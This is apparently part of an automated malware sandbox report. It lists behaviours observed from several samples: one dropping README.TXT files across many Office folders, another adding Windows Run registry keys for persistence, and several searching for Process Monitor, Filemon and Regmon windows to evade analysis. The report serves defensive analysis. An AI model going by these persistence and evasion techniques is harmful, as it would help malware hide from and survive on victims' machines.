                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\Advanced\Images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\Publisher\Backgrounds\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\Bibliography\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\DataServices\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\PUBFTSCM\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\PUBSPAPR\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\QuickStyles\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Bibliography\Sort\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Bibliography\Style\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\CONVERT\1033\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\Power Map Excel Add-in\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\Power View Excel Add-in\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\PowerPivot Excel Add-in\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\PowerPivot Excel Add-inv16\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\DCF\1033\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\DCF\en\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Document Parts\1033\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FORMS\1033\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Library\Analysis\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Library\SOLVER\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCard\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCardRollback\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\Access\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\GettingStarted16\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\ONENOTE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\Fonts\private\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\DESIGNER\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\ODBC\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\System\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX64\Microsoft Office\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\Microsoft Office\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\Microsoft SQL Server\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ar\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\bg\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ca\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\cs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\da\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\de\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\el\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\en-us\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\es\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\et\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\eu\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\fi\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\fr\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\gl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\he\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\hi\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\hr\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\hu\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\id\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\it\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ja\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\kk\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ko\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\lt\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\lv\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ms\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\nl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\no\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\pl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\pt\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\pt-BR\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ro\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ru\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sk\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sr-Cyrl-BA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sr-Cyrl-RS\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sr-Latn-RS\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\sv\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\th\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\tr\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\uk\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\vi\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\zh-CN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\zh-TW\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ODBC Drivers\Salesforce\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Apply\FilesInUse\AAD0B0DB-711A-45EF-A013-BDD28531EC08\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OutlookReactNative\SearchView\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Download\PackageFiles\AAD0B0DB-711A-45EF-A013-BDD28531EC08\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000002\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000006\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000011\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000018\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000027\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000042\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000043\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000049\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000050\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000054\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000055\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000058\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000062\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000063\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000064\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000068\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000069\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000070\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000072\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000076\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000079\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000083\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000084\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000087\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000088\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000098\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000099\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000101\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000104\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000105\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000106\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000107\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000108\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000109\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000113\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000117\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000118\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000119\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000120\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000122\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000123\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\fa000000124\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000125\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000128\README.TXT

                          Boot Survival

                          barindex
                          Creates multiple autostart registry keys
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 955e8e90f4.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fa1ce2a324.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b6866cbf49.exeJump to behavior
                          Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeWindow searched: window name: PROCMON_WINDOW_CLASS
